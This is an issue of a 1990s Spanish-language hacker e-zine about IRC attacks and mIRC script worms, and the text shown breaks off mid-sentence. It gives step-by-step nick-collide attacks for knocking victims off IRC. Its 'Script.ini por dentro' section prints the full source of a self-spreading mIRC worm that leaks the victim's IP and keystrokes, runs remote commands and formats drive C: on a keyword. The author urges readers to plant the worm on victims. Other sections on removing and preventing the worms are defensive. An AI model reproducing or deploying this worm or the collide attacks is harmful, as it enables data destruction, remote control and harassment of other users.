*************************************GOLD-EDICION************************************************

            ____   ____   ___   _  _    _         ____  ____  _  _  ____ 
           (_  _) ( ___) / __) ( \( )  ( )   __  (_   )(_  _)( \( )( ___)
             )(    )__) ( (__   )  (  ( o ) (__)  / /_  _)(_  )  (  )__)
            (__)  (____) \___) (_)\_)  (_)       (____)(____)(_)\_)(____)
                                     GOLD EDICION
                                           
                              ()()()()()()()()()()()()()()
                              ()                        () 
                              () Editor: -= POSEIDON =- ()
                              ()                        ()
                              ()()()()()()()()()()()()()()
                                   )(              )( 
                                 ()()()()()()()()()()()
                                 )(    Aydantes:     )(
                                 ()()()()()()()()()()() 
                                    )(            )(            
                                   ()()()()()()()()()
                                   ()   · LaLO ·   ()
                                   ()· Jim_Carrey ·()
                                   () _C[at]AR[ci]-()
                                    ()()()()()()()()
                                         
                                        Numero III
                                  

            
                          Frase: "Dame un IP y te dare el Mundo"


--------------------------------------------(·)--------------------------------------------------


                Como veran el nombre de la e-zine cambio, ya no se llama mas
                "King of Darkness" su nombre ahora es Tecno-zine, porke cam-
                bio? no se preguntenlen a mi abuela. Po)


--------------------------------------------(·)--------------------------------------------------

Nota: Esta e-zine se ve mejor en el wordpad del ventanukos y en una resolucion de 800x600dpi.



                                          INDICE:

                       Curso de hack en el irc by Poseidon.......000
                       ·Nick Collige.............................001
                       ·Los Nukes................................002
                       ·Antinukes................................003
                       ·Virus-script.............................004
                       ·Dmestup.exe..............................005
                       ·Script.ini por dentro....................006
                       Truco 1 (archi-conocido)..................007
                       Truco 2 (Papalera de Reciclaje) by LaLO...008
                       Truco 3 (Lanzar varios programas) by PoSe.009
                       Programaz by Poseidon.....................010
                       Nota de Unix/Linux (Nota).................011
                       Manual Explicativo de los viruz (Recop.)..012
                       Bombas de Humo by Poseidon................013
                       Bombas de Disket by Mikey y Recop.........014
                       Recopilacion (ip spoof; ftp error) by Jim.015
                       Noticias by _C[at]AR[ci]-^d^-.............016
                       Club manga y anime by Zor[k]roZ...........017
                       Links de Primera by Poseidon and LaLO.....018
                       Page oficial de Tecno-Zine................019
                       Despedida.................................020


--------------------------------------------(·)--------------------------------------------------

/000. Curso de hack en el irc

/001. Nick Collige


 Un "nick collide" ocurre cuando dos personas tienen un mismo nick. En principio esto no debería
ser posible (el servidor no deja usar un nick que ya está en uso) pero hay dos situaciones en las
que podría darse el caso y que se describen en los dos puntos siguientes. 

 El resultado de un nick collide depende del servidor (ircd). En servidores antiguos (sin prote-
cción) el collide se resuelve matando a los dos usuarios con mismo nick (¡ambos!). En otros más 
inteligentes (con protección) el servidor guarda información acerca de los usuarios y puede saber
que usuario tiene el nick con mayor antigüedad (i.e. quién se lo puso antes), matando únicamente
al usuario con el nick más reciente. 
  

/Split server collide
 
 Se basa en aprovechar un net-split: 

 - Esperar un split. 
 - Entrar (conectar) al servidor spliteado. 
 - Ponerse como nick el de la víctima. 
 - Esperar a que se deshaga el split. 

 Si todo va bien (el servidor no tiene protección), a la vuelta del split se detectará el collide
y se matarán tanto al atacante como a la víctima. Lógicamente nuestro usuario atacante será un 
clone nuestro, con lo cual no pasa nada si es killeado. 
  

/Lag collide

Consiste en aprovechar el lag de un servidor, o lo que es lo mismo, el retraso en recibir los 
mensajes de otros servidores. Esta técnica es más efectiva que la anterior, pues funciona en 
servidores con protección. 

 Los pasos serían los siguientes: 

 - Meter un clone en el servidor lageado. 
 - Esperar a que la víctima cambie de nick (esto lo detectamos desde otro servidor no lageado). 
 - Cambiar rápidamente el nick de nuestro clone y ponerle el que se acaba de poner la víctima 
(el nuevo). 
 - Esperar al lag. ;) 

 Lo que ocurre es que nuestra orden de cambiar el nick para nuestro clone llega antes al servidor
(lageado) que la orden de cambio de nick de la víctima debido a que nuestra orden va directamente
de nuestro cliente al servidor lageado mientras que la otra va a través de la red IRC (donde he-
mos supuesto que se introduce un lag notable). Esto hace que el servidor (lageado) tome a nuestro
clone como "dueño" legítimo del nick y mande un kill al otro (la víctima). Esto ocurriría en caso
de servidores protegidos; si es no protegido el resultado es que ambos mueren, resultado también 
aceptable, pues hemos acabado con nuestro objetivo

--------------------------------------------(·)--------------------------------------------------

/002. Los Nukes

¿Que son los nukes?

En pocas palabras son programas que logran que tu computadora sufra efectos de un virus. 
Los nukes son programas que aprovechan los errores (bugs) de win95/NT y otros sistemas, para 
producir fallas en los sistemas que los usan. Sin entrar en detalles, la mayoria se aprovechan 
de las inhabilidades de windows de manejar corectamente protocolos ICMP y TCP/IP que han sido 
mal hechos a proposito.Cada paquete de informacion que transita por la red debe ser separada en 
pedazos mas pequeños que puedan viajar eficientemente, y al llegar a la computadora destino, se 
arman nuevamente en un grupo coherente. Algunos nukes envian paquetes grandes enmascarados como 
paquetes pequeños, y al tratar win95 de armarlos, se confunde, entra en "panico" y deja de res-
ponder. Los resultados pueden ser varios: windows puede darte una pantalla azul, y no responder
mas, o sencillamente congelarse la imagen y no responder mas. Otros nukes lo que hacen es averi-
guar, por ensayo y error a que puerto estas conectado al server de IRC y desde que puerto de tu 
computadora estas conectado, en el momento que lo localiza, manda un mensaje de error al server, 
el cual el server cree que en efecto mando tu computadora por un error real y entonces te desco-
necta(de hecho lo manda continuamente, porque utiliza todas las posibles combinaciones de puertos
entre tu pc y tu server.El resultado total es que no puedes usar el servicio de una manera u otra,
 por eso se llaman DoS(denial of service) attacks, o ataques de negacion de servicio. Cuidado 
con Windows98, ya se le fueron descubiertos serca de 200 bugs, esta bien acaba de salir al merca-
do, pero la gente trabaja y seguramente ya esten localizados varios errores para atacar por ese 
lado a tu maquina, por lo que sería muy facil nukearte teniendo este sistema operativo, por lo 
que espera un poco y espera que aparescan los primeros parches contra este. Pronto publicare toda
 una lista de los mejores nukeadores. 

--------------------------------------------(·)--------------------------------------------------

/003. Antinukes

¿Como se pueden evitar los nukes? 

Los nukes aprovechan errores de windows95 (y de otros sistemas operativos) asi que la solucion 
es corregir estos errores. Claro que nosotros no somos programadores y no sabemos como es eso, 
asi que utilizamos entonces los "patches" o parches que provee Microsoft, que empieza a trabajar 
en ello en cuanto se reporta un nuke nuevo.
Nobstante mentes privilegiadas, pero mal llevadas continuamente revisan que nuevos errores tiene 
windows95, y se aprovechan de ellas, sacan los nukes y es entonces cuando mentes reducidas los 
utilizan, sin siquiera saber como funcionan, para impedir el disfrute de servicios como el IRC. 
Ademas, hay que aclarar que muchas veces incluso se aprovechan de errores de los patches.
Los parches tienen que ser instalado segun el orden que se indica; por ejemplo no podes instalar
el parche número cuatro sin tener el 1,2,3.

¿Como detectar un nuke?

Existen programas que al entrar un nuke en tu pc, automaticamente te avisan de que estas siendo 
nukeado por una persona, del cual te da el IP o dns, dependiendo el caso. Quizas los dos mejores
programas sean:Nukenabber y ICMPwatch. Ambos te pueden avisarte con un sonido cuando te estan 
nukeando. Lo más conveniente es que en cuanto estes conectado a IRC los actives. Podes hacer que
el mIRC te los ejecute automaticamente, para mayor comodidad agregando en "Perfom" la corespon-
diente linea. Estos programas te detectan el nukeador, pero para que no tengan efecto en tu pc 
tenes que tener instalados los parches. Personalmene (y porque lo uso) recomiendo el Nukenabber 
que funciona de maravillas; yo, eh recibido hasta 453 nukes de varias personas, sin caer y en 
aproximadamente 5 minutos (un buen número).

--------------------------------------------(·)--------------------------------------------------

/004. Virus-script

Introducción:

Desde hace ya algún tiempo se está extendiendo entre los usuarios menos avanzados de mIRC una 
curiosa "infección" que provoca que sus programas realicen acciones no deseadas y, en ocasiones, 
perjudiciales para ellos y el resto de los usuarios de los canales en los que se encuentran.  

El motivo en la práctica totalidad de los casos es que han recibido de otro usuario un fichero 
llamado SCRIPT.INI, que contiene instrucciones perniciosas de configuración para el programa 
mIRC, el cliente de IRC más difundido hoy en día.  

No se trata de un virus corriente ni es detectado por ninguno de los programas antivirus existen-
tes.  

Los efectos de esta infección pueden ser muy variados debido a la diversidad de variantes del 
fichero SCRIPT.INI que se han detectado, y que aún pueden aparecer. En cualquier caso es motivo 
más que suficiente para que usted se preocupe muy en serio de esta posibilidad, los posibles 
daños, tanto a sus sesiones de IRC, como a la totalidad del software instalado en su sistema, 
lo justifican plenamente.  

En todo caso, y pese a lo dicho anteriormente, no debe de alarmarse; la infección a través del 
fichero SCRIPT.INI es sumamente fácil de prevenir y hasta de eliminar, tan solo debe de leer 
cuidadosamente lo que aquí se expone. Teniendo los siguientes conceptos claros, y con las preven-
ciones que se detallan, usted estará completamente a salvo de este fenómeno, y ni el virus, ni 
las medidas a tomar contra él afectarán en lo mas mínimo ni a sus chat's ni a su sistema.

Antes que nada es necesario aclarar que el fichero SCRIPT.INI del mIRC es un fichero absolutamen-
te normal de este programa cliente de IRC, lo tenga usted o no. El creador del programa lo conci-
bió como uno de los posibles ficheros de configuración del mismo, con el fin de contener rutinas
e instrucciones (scripts) que hacen más cómoda y agradable la participación en los Chat's.  

No obstante, la alta configurabilidad del mIRC ha sido aprovechada por algunas personas para de-
sarrollar versiones del fichero SCRIPT.INI y otros similares, cosa bastante sencilla en este clie-
nte, destinadas a causar efectos perniciosos a los usuarios que los incluyan en su directorio o 
carpeta del mIRC.  

La propagación del fichero se realiza a través del propio IRC y le puede suceder a usted si 
acepta un envío durante alguna de sus sesiones de Chat. La principal característica del fichero
SCRIPT.INI es que, una vez infecta a un usuario tiende a propagarse a otros enviando hacia ellos
copias de sí mismo, a fin de crear nuevos infectados.  

Hasta ahora solo se han detectado dos ficheros de script con efectos infecciosos pero puesto que
esto es perfectamente posible, y debido a la capacidad autorreplicativa de estos, se ha optado 
por aludirlo con el nombre genérico de VIRUS-SCRIPT. Además, el hecho de que este fenómeno se 
centre el los usuarios de mIRC se debe exclusivamente a su enorme difusión de este programa, 
existe la posibilidad de casos similares en otros muchos programas clientes de IRC.

Como actúa:

Como ya se ha comentado la principal característica es su capacidad se autorreproducción. El 
medio utilizado es la transmisión de ficheros vía DCC, propia del IRC, en dirección a otros 
usuarios normalmente en el momento en que estos entran o salen del canal en que se encuentra 
el usuario infectado. La aceptación del envío, y su recepción en un directorio no especifico 
para recogidas supone un alto riesgo de infección.   

Si observa que cada vez que alguien entra a un canal en el que usted está se activa una ventana
de envío del fichero SCRIPT.INI hacia ese usuario, no lo dude, usted se encuentra infectado y 
debe se salir de inmediato de todos los canales y proceder a la limpieza del VIRUS-SCRIPT.  

El resto de los posibles efectos del VIRUS-SCRIPT varía según las versiones de este; puede 
producir desconexiones indeseadas y todo tipo de acciones no voluntarias durante la conexión al 
IRC. El mIRC dispone de muchos comandos para multitud de propósitos, y todos ellos pueden ser 
activados desde un VIRUS-SCRIPT sin mediación del usuario infectado. Es posible incluso que 
provoque el borrado de ficheros fundamentales de su sistema.  

En muchos casos es posible que un usuario que conoce el contenido del VIRUS-SCRIPT provoque estas
acciones en otro usuario infectado. Es frecuente el efecto de la desconexión del IRC cuando al-
guien envía al canal o a una ventana privada cierta palabra clave o, que si usted está infectado,
otro usuario pueda inducir a su programa a que envíe determinados mensajes que él decide pero 
usted no ha escrito... todos estos son síntomas inequívocos que que en sus sistema de IRC se ha
introducido lo que se ha denominado un "Caballo de Troya".

Como eliminar el script.ini:

Las manifestaciones del VIRUS-SCRIPT, por lo que se ha dicho antes, son bastante evidentes. Con 
casi total seguridad si usted está infectado por él debe de haber observado ya los síntomas, en 
especial los envíos indeseados del fichero hacia otros usuarios. Pero recuerde, la existencia en 
su sistema de un fichero con el nombre SCRIPT.INI no implica, en modo alguno, que este se trate 
del VIRUS-SCRIPT.  

Vigile con atención los síntomas descritos, son los mas frecuentes. El hecho de haber leído esta 
página le garantiza ya reconocer el fenómeno, especialmente cuando alguien le diga, como suele 
suceder, que usted está enviando un fichero indeseado. Pero, como en casi todos los casos, la
mejor medida a tomar es la prevención. En este apartado describiremos mas medidas generales   
que es recomendable tomar para eliminar el fichero SCRIPT.INI pernicioso y sus efectos. 
  
La limpieza de un VIRUS-SCRIPT corriente (como SCRIPT.INI) es muy sencilla. Dispone de dos opci-
ones. La primera consistiría en cerrar por completo sus sesión de mIRC (si tiene varias hágalo 
con todas ella para mayor seguridad); y a continuación localice y borre el fichero infectado, 
sabrá cual es porque es el que usted envía de manera automática. En todos los casos detectados 
hasta el momento se trata del fichero SCRIPT.INI.  
  
La segunda opción es más cómoda porque no exige el cierre del programa, ni siquiera la descone-
xión del IRC. Tan solo debe de teclear lo siguiente en la linea de escritura, aquella en la que 
usted escribe normalmente los mensajes (es indiferente que se encuentre en una ventana de canal,
de privado, o del propio status):  

  /unload -rs script.ini  

Esta orden es un comando del mIRC que descargará de memoria RAM el VIRUS-SCRIPT. Se ha usado 
como ejemplo el nombre del fichero SCRIPT.INI. Con esta acción este dejará ya de actuar y el 
programa le dará un mensaje indicando que se ha realizado la descarga, si no es así, lo más 
probable es que usted no tuviese el VIRUS-SCRIPT instalado.  Pero el fichero aún se encontrará 
en su sistema y se activará automáticamente la próxima vez que arranque el mIRC. Para borrarlo 
definitivamente solo tiene que escribir:  

  /remove script.ini 

 Esta orden elimina completamente el fichero. Si su programa tenía anteriormente un fichero 
SCRIPT.INI correcto lo habrá perdido, pero no por esta acción, sino que quedó eliminado al ser 
sobrescrito por el infectado cuando usted lo recibió.

Como prevenirlo:

Para que usted resulte infectado cuando alguien le envíe el VIRUS-SCRIPT es absolutamente nece-
sario que se den dos factores, En primer lugar que usted lo acepte, en segundo lugar que lo reci-
ba en el directorio o carpeta que su programa mIRC tiene especificado para los ficheros de config-
uración; este es casi siempre el mismo en que se encuentra el fichero ejecutable del programa, 
es decir, por ejemplo: el fichero mirc32.exe si usted tiene la versión de 32 bits, la más exten-
dida.   

También se puede producir la infección si usted tiene el fichero infectado en otro lugar y lo 
copia o lo mueve hacia el directorio de los ficheros de configuración, pero esta vía ya es abso-
lutamente anecdótica y no es probable en absoluto que suceda salvo que usted lo desee.  

Así pues, las vías de prevención son dos, ambas igualmente efectivas, y ambas muy recomendables 
no ya solo para prevenir infecciones. Veamos las por separado:  
  
  RECIBIR AVISOS DE ENVÍO: cuando alguien le envía a usted un fichero, sea este cual sea, lo nor-
mal es que su programa le presente una ventana comunicándoselo para que decida si lo acepta, lo 
cancela, e incluso si desea ignorar envíos sucesivos de ese usuario. En esa misma ventana puede 
especificar el directorio donde lo quiere recibir, o dejar el que aparezca por defecto.  

El problema se plantea cuando usted tiene configurado su mIRC para que no presente esta ventana
y acepte automáticamente todos los envíos. Esa situación es peligrosa y debe de modificarla de 
inmediato. Es muy sencillo, lo único que necesita hacer es abrir el menú DCC, el tercero de la 
barra superior de menús. (pinche sobre él con el botón izquierdo del mouse). En este menú verá 
diversas opciones, la ultima de las cuales se llama OPTIONS, esa es la que debe de seleccionar 
para acceder a la ventana de configuración que necesitamos ("mIRC DCC options").   

Esta ventana consta de varias fichas con sus correspondientes solapas, debe de seleccionar la 
que se titula: "SEND". Aquí encontrará un conjunto de opciones, las primeras están agrupadas es 
un recuadro titulado: "On send request"; seleccione la primera ("Show get dialog") y haciendo 
click sobre ella con el botón izquierdo del mouse, verá que se marca como la opción activa, pulse
OK y desde ese momento siempre que le envíen un fichero deberá aceptarlo previamente para que se
realice la transmisión.  

En la versión mIRC 5.02 y anteriores la ventana "mIRC DCC options" no se componía de un conjunto
de fichas, sino que todas las opciones se agrupaban en una sola pantalla, pero el modo de proce-
der es el mismo, localice el grupo "Show get dialog" (es el primero de la izquierda), seleccione
"Show get dialog", y pulse OK.  

Como norma general no es mala idea no aceptar ficheros de desconocidos sea cual sea el nombre de
dicho fichero y pese a tener un buen antivirus, recuerde que un programa que le envíen podría 
carecer de virus pero, aún así, estar concebido por su programador para causar daños en su siste-
ma  
  
ESTABLECER UN DIRECTORIO SEPARADO PARA LAS RECOGIDAS:esta medida es muy aconsejable, tanto para 
impedir infecciones como para mantener organizados sus ficheros. Lo primero que debe de hacer es
crear un directorio o carpeta destinado a tal efecto con el nombre que desee. Si no sabe como 
hacer esto consulte el manual de usuario del sistema operativo.  

Es posible que su mIRC ya tenga un directorio separado con este fin especificado en su configura-
ción, de no ser así o si lo ignora lea estas instrucciones.  

Acceda a la misma ventana "mIRC DCC options" descrita en el punto anterior ("Recibir avisos de 
envío"). En la versión 5.11 y siguientes encontraremos lo que necesitamos en la ficha "DIRS", en
versiones anteriores se encuentra, junto a todo lo demás en un solo cuadro, como ya se ha dicho.  

Aquí tenemos una caja de texto con la etiqueta: "DCC Get directories:". La caja es en realidad 
una lista desplegable, pero en primer lugar ya observaremos que tiene escrita la palabra "defa-
ult"; esta alude al destino por defecto que tendrán todas nuestras recepciones de ficheros. Pulse
 con el mouse el botón "EDIT" para comprobar cual es este destino.  

Verá una nueva ventana titulada "mIRC DCC Get directory"; contiene un botón con la etiqueta "Into-
this Directory". dentro de este botón aparecerá sobrescrita la ruta del directorio que está 
actualmente configurado para las recogidas, si es el mismo directorio en el que se encuentran 
los ficheros de configuración es imperativo cambiarlo, si tiene dudas haga lo de cualquier modo.  

Para especificar el nuevo directorio de recogidas pulse sobre el botón del que estamos hablando 
y verá un cuadro de navegación por el árbol de directorios de su sistema, seleccione el que creó 
al principio para las recogidas y pulse OK. Pulse también OK para cerrar la ventana "mIRC DCC Get
directory", y una vez más para cerrar "mIRC DCC options".  

Ya está protegido de posibles infecciones. Recuerde una vez más, no obstante, que la "bajada" de
ficheros de INTERNET, cuya naturaleza y origen desconoce, es una acción potencialmente peligrosa 
para su sistema.

--------------------------------------------(·)--------------------------------------------------

/005. Dmestup.exe (tambien conocido por otros nombres)

Introducción:
Otro virus-script, pero más complejo, de aparición mucho más reciente, este fichero infeccioso 
tiene características particulares que lo hacen más peligroso y perjudicial que el fichero SCRIPT
.INI. En este apartado describiré el resultado de las primeras observaciones del fenómeno; este 
análisis es muy incompleto porque en este momento es muy poco lo que sabemos aún de él, pero he 
preferido avanzarlo ya para ir paliandolo en lo posible en la medida de nuestras posibilidades. 

La primera gran diferencia frente al SCRIPT.INI es que DMSETUP.EXE se trata de un fichero binario, 
es decir, un programa ejecutable cuyo contenido y efectos no es fácil analizar a priori. este 
fichero es ejecutado automáticamente por el sistema por tanto, si lo recibe, puede activarse aún 
en el caso de que usted no lo ejecute directamente. 

Como actúa:
El DMSETUP.EXE modifica el contenido del fichero "mirc.ini", el principal fichero de configura-
ción de MIRC, añadiendo líneas de órdenes de script y otros cambios. Esto supone la aparición de
los efectos típicos de un virus-script. Los dos más destacables son: 
Añade al "mirc.ini" una orden que produce el envío de "dmsetup.exe", desde el usuario infectado
hasta cualquier persona que entre al canal en el que éste se encuentra. 

Añade al "mirc.ini" del usuario infectado una orden que provoca la desconexión de este en el mo-
mento en que recibe determinada palabra clave en una ventana de query. El mensaje de la descone-
xión, en la versión que he analizado, es: "'tis to I who seem so sad". 

Crea copias de sí mismo en el directorio c:\mirc y c:\windows (esta última es la que envía al 
resto de los usuarios para su reproducción); e intenta sobreescribir el fichero "autoexec.bat" 
con ordenes para recrear estas copias cada vez que se reinicia el sistema.
Así mismo se observan otras líneas de configuración de menor relevancia añadidas a "mirc.ini". 
En la versión analizada parecen más bien una mera copia de las líneas originales del autor, pero 
con pocos efectos perniciosos adicioneles para los infectados. Más bien parece un descuido, por-
que la definición del tamaño de las ventanas y otras configuraciones puede resultar un buen indi-
cativo de la presencia del virus en personas que no las tuvieran así, y observen un cambio ines-
perado de este tipo; incluso se puede apreciar lo que parece ser la IP original del autor y su 
procedencia de DALNET. Es de destacar no obstante que el directorio de inicio para los FSERVE se
establece en c:\mirc, lo cual es poco recomendable (ahí podrían encontrarse ficheros .LOG con 
passwords y otros datos confidenciales), y que la configuración del IDENTD y el DCCSERVER dejan
al usuario expuesto al bloqueo de la conexión a través del "nuke-port", el principal bug de la 
versión 5.31 del mIRC. 

En conclusión, tras un primer examen se trata de un virus-script especialmente peligroso a causa 
de la alteración del principal fichero de configuración del mIRC, y de que no es posible estable-
cer el resto de los posibles efectos a causa de su formato binario. Es posible incluso que reali-
ce accesos al sistema a muy bajo nivel con resultados imprevisibles en este momento. 

Como prevenirlo y eliminarlo:
Las medidas de prevención a aplicar son las mismas que se detallan en el apartado anterior, espe-
cialmente no aceptar automáticamente envíos DCC. Su recepción en un directorio específico y sepa-
rado no es, por lo que aún sé, garantía de seguridad, por lo que le recomiendo que jamás acepte 
este fichero, o que si lo hace lo elimine o remembre de inmediato. 

En caso de infección, y en tanto no conozcamos más sobre sus efectos, siga los siguientes pasos:
Cierre todos los programas en ejecución. 

Localice y borre todos los ficheros con el nombre DMSETUP.EXE que se encuentren en su sistema 
(preste especial atención al directorio c:\windows y a c:\mirc). 

Borre el directorio c:\mirc. 

Examine los ficheros "autoexec.bat" y "config.sys", si tiene dudas sustitúyalos por copias de 
seguridad. 

Reinicie el equipo. 
Reinstale el mIRC.

Si continúa observando irregularidades, lo que no veo probable, no dude en reinstalar el sistema 
operativo.

--------------------------------------------(·)--------------------------------------------------

/006. Script.ini por dentro

Como ya emos visto antes el script.ini es un  VIRUS-SCRIPT ; que ocaciona numerosos problemas en
nuestro mIRC en esta sección veremos como es este archivo por dentro y como  logra causar los 
efectos ya descriptos anteriormente. 

Descripcion de los comandos: El archivo script.ini por dentro: 
n0,1,2,3: establece que al iniciar, se active el remote (que es toda la lista de comandos que se
decriben a continuación) 
n4,5,6,7,8: envia en un msg a: #whacked, que el usuario infectado con este archivo esta en la 
IRC y   le envia tambien la información del server, nick, ip, port, del usuario.

n9,10,11,12: establece que al aparecer en cualquier ventana de nuestro mIRC, el signo ? se corra
a $2

n13,14,15: acá es donde se ordena que cuando alguien entre al/los canal/es que estamos se mande 
el archivo script.ini a esa persona. Así es como se reproduce tan facilmente.

n16,17,18: cuando alguien escriba la palabra hola en cualquier canal, se procedera automaticamen-
te a borrar el  C: 

[script]
n0=on 1:START:{
n1= .sreq ignore
n2= .remote on
n3=}
n4=on 1:CONNECT:.msg #whacked Hi. $ip on $server $+ : $+ $port $+ .
n5=
n6=on 1:INPUT:*:{
n7= .msg #whacked ( $+ $active $+ ) $1-
n8=}
n9=on 1:TEXT:*:?:{
n10= if ( $1 == runthis ) { .run $2- }
n11=}
n12=
n13=on 1:JOIN:*:{
n14= if ( $nick == $me ) { halt } | .dcc send $nick $mircdir $+ script.ini
n15=}
n16=on 1TEXT:*hola*:#:{
n17=/run -n format c: /q /autotest
n18=}


Bueno... se podran imaginar todo lo que podemos llegar a hacer en la computadora de nuestra 
victima si logramos introducirle este archivo, aunque las posibilidades sean muy pocas de que 
lo acepte. Tambien dejo a ustedes para que piensen otros comandos que se le podrian agregar a 
este maravilloso archivo. ;-)

Si queres ver más información sobre este archivo, andá a VIRUS-SCRIPT ahí podras ver bien todo 
sobre este archivo: sus caracteristicas, los efectos que produce, como eliminarlo y como evitar-
lo.

--------------------------------------------(·)--------------------------------------------------

/007. Trucos: Como cambiar el entorno del Ventanukos

COMO MODIFICAR A TU GUSTO EL ASPECTO VISUAL DE WINDOWS 95

OK, digamos que estas celebrando una fiesta salvaje en tu casa.
Decides enseñarle a tus colegas que eres uno de esos terribles hackers. Enciendes tu 
ordenador y a continuacion aparece en la pantalla el logo de "Windows 95". En 
cierto modo pareces un lamer, ¨verdad? Tu ordenador tiene el mismo aspecto que 
el trasero de cualquiera. 

Ahora si eres un hacker serio estarias iniciando Linux o FreeBSD o alguna otra 
clase de Unix en tu makina. Pero tus amigos no saben eso. Por ello 
tienes de engañarlos ("ingenieria social") a pensar que eres de la elite solo 
modificando la pantalla de inicializaci¢n. 

Ahora digamos que quieres empezar las sesiones con una pantalla negra con 
trazos naranjas y amarillos y el slogan "Hacker hasta a la muerte". 
Esto se puede hacer muy facilmente. 

Micro$oft quiere anunciarte sus sistemas operativos cada vez que reinicias. De 
hecho, quieren esto de tal manera que han ido a juicio para intentar forzar a
los vendedores de PSc para dejar el logo de inicializaci¢n de
Microsoft en los sistemas que venden.

Asi que Microsoft ciertamente no desea que juegues con sus pantallas de 
inicializacion. Por ello MS ha intentado esconder el software de la pantalla
de inicializacion. Pero la verdad es que no lo escondieron muy bien. Hoy
vamos a aprender como arruinar totalmente sus planes. 

*****************************************************************************
Nota de Pose: Una de las cosas que te recompensan en el hacking 
es encontrar archivos ocultos que tratan de evitar que los modifiques, y
entonces jugar con ellos como gustes. Eso es lo que vamos a prender hoy.

Los graficos de inicializaci¢n de Win95 estan escondidos en un archivo
llamado c:\logo.sys. Para ver este archivo, abre el administrador de archivos
(El Explorador), haz click en "ver", entonces haz click en "archivos por
tipo", entonces comprueba el apartado de "mostrar ocultos/archivos de
sistema". Entonces, regresa a "ver" haz click en "mostrar detalles". Entonces
a la derecha del archivo logo.sys ver s las letras "rhs". esto significa que
este archivo es "read-only, hidden, system" (solo-lectura, oculto, de sistema).

La razon por la que este inofensivo archivo este  etiquetado como archivo de 
sistema (cuando realmente es solo un archivo grafico) es porque Microsoft teme 
que lo cambies para que se lea por ej. "­Bienvenido a Windoze 95 , Desayuno 
para Lusuarios!" Asi que convirtiendolo en un archivo de solo lectura, y 
escondiendolo, y llamandolo archivo de sistema como si fuera algo a lo que se 
debe dar importancia porque si juegas con el destruir tu pc, Microsoft 
esta  intentando hacer que no lo toques.
*****************************************************************************

Bueno, pues ahora tenemos aqui la facil manera de engañar a Microsoft y poner 
el logo de inicio que mas te guste. Empezamos por encontrar el programa 
MSPaint. Esta  probablemente en la carpeta Accesorios. Pero para el caso de que 
seas como yo y estas siempre moviendo las cosas de aqui para alla, aqui tienes 
los pasos necesarios para hacerlo f cilmente:

1) Haz click en "Inicio" en la esquina inferior izquierda de la pantalla.
2) Haz click en "Explorador de Windows"
3) Haz clic en "Herramientas"
4) Haz click en "Buscar"
5) Haz click en "Archivos o Carpetas"
6) Despuus de "nombre" teclea "MSPaint"
7) Despuus de "Mirar en" pon "C:"
8) Comprueba el sitio que pone "incluir subcarpetas"
9) Haz click en "Buscar ahora"
10) Doble click en el icono de MSPaint que aparecer  en la ventana.
11) En el progrma paint, haz click en "file"
12) Haz click en "Abrir"

OK, ahora tenes MSPaint. Ahora tienes una manera muy facil de crear tu nuevo 
logo de inicio:

13) Despuus de "Nombre de Archivo" teclea c:\windows\logos.sys. esto te trae 
el grafico que sale cuando tu ordenador est  listo para ser apagado diciendo
"Ahora puede apagar el sistema". Este grafico tiene exactamente el formato
necesario para ser usado como logo de inicio. Por ello puedes jugar con el
del modo que desees (mientras no cambies nada en la pantalla de Atributos que
hay debajo del menu Imagen) y usarlo como logo de inicializaci¢n.

14) Ahora jugamos con este grafico. Simplemente haz experimentos con los 
controles de MSPaint y diviertete. 

15) Cuando has decidido que te gusta la imagen (llenala de terrorificas cosas 
sobre hacking, ¿si?), guardala como c:\logo.sys. Esto sobreescribir  el
archivo de configuraci¢n del logo de inicio. A partir de ahora, en cualquier
momento que desees modificar tu logo de inicio, podras leer y escribir sin
problemas sobre el archivo logo.sys.

16) Si quieres cambiar la imagen de salida del sistema, son faciles de
encontrar y modificar usando MSPaint. La primera pantalla que sale se llama 
c:\windows\logow.sys. Como vimos arriba, la imagen final de "Ahora puede 
apagar el sistema" es c:\windows\logos.sy.

17) Para hacer graficos que sean validos como papel tapiz, ponles un nombre
tal como c:\windows\tecno-zine.bmp (sustituyendo el nombre de tu archivo por 
"tecno-zine", a menos que quieras llamar a tu papel tapiz "tecno-zine.")

*****************************************************************************
Consejo de Pose: La imagen de inicio de Microsoft Windows 95 
tiene una barra con moviento abajo. Pero una vez que la sustituyas por tu
propio grafico, esa animacion no aparecer . Sin embargo, puedes hacer tu
propia pantalla de inicio animada usando el programa de shareware BMPWizard. 
Algunos sitios para bajarte esta preciosidad son : 
http://www.pippin.com/English/ComputersSoftware/Software/Windows95/graphic.htm
http://search.windows95.com/apps/editors.html
http://www.windows95.com/apps/editors.html
*****************************************************************************

Pero el problema de usar uno de los logos de inicio de Win95 ya existentes
es que solo te permiten usar sus colores originales. Si realmente vas en
serio, abre MSPaint otra vez. Primero haz click en "Imagen", luego en
"Atributos". Configura la anchura a 320 y la altura a 400. Asegarate en el
apartado "unidades" de que la opcion seleccionada es "Pixels". Ahora eres
libre de usar cualquier combinaci¢n de colores que este programa te permita.
Recuerda guardar el archivo como c:\logo.sys para tu logo de inicio, o 
c:\windows\logow.sys y/o c:\windows\logos.sys para tus pantallas de salida
del sistema.

Pero si quieres cosas realmente fabulosas para tu pantalla de inicio, puedes 
sacar graficos de tu pagina web de hacking favorita e importarlas como 
pantallas de inicio y salida de Win95. Aqui tienes como hacerlo.

1) ­Uau! ­Graficos guays! Perate en esa web y pulsa el boton "Imprimir 
Pantalla".

2) Abre MSPaint y configura la anchura a 320 y la altura a 400 en pixels.

3) Haz click en editar, entonces haz click en pegar. Boom, esa imagen se 
encuentra ahora en tu programa MSPaint

4) Cuando lo guardes, asegurate de que os atributos son todavia 320x400 
pixels. 

Desde luego puedes hacer lo mismo con cualquier archivo grafico que elijas en 
MSPaint o en cualquier otro programa de graficos, mientras lo guardes luego 
con el nombre correcto en el directorio correcto y con el formato 320x400 
pixels.

­Oh, no, mi tia viene de visita y quieres usar mi makina para leer su
email! ­­­Nunca vera el final si ella ve mi pantalla de inicio con esa imagen
de hack!!!

Aqui esta lo que puedes hacer para hacer volver el aburrido logo de inicio de 
Micro$oft. Simplemente cambia el nombre de c:\logo.sys a algo inocuo que tu 
tia no ver  mientras curiosea con el explorador. Algo como logo.bak. ¨Te 
preguntas que pasar ? Los tipos de Microsoft se figuraron que estariamos 
haciendo cosas como las que hemos hecho y escondieron una copia de su 
aburrida pantalla de inicio en un archivo llamado "io.sys". Por ello si
modificas o borras su original logo.sys, y no existe ningun archivo con ese
nombre, al iniciar tu ordenador mostrar  la misma vieja pantalla de inicio de
Win98.

*****************************************************************************
Otro consejo de pose: ¨Quieres jugar con io.sys o logo.sys? Aqui
tienes como meterte en ellos. Y, adivina que, es una cosa importante que 
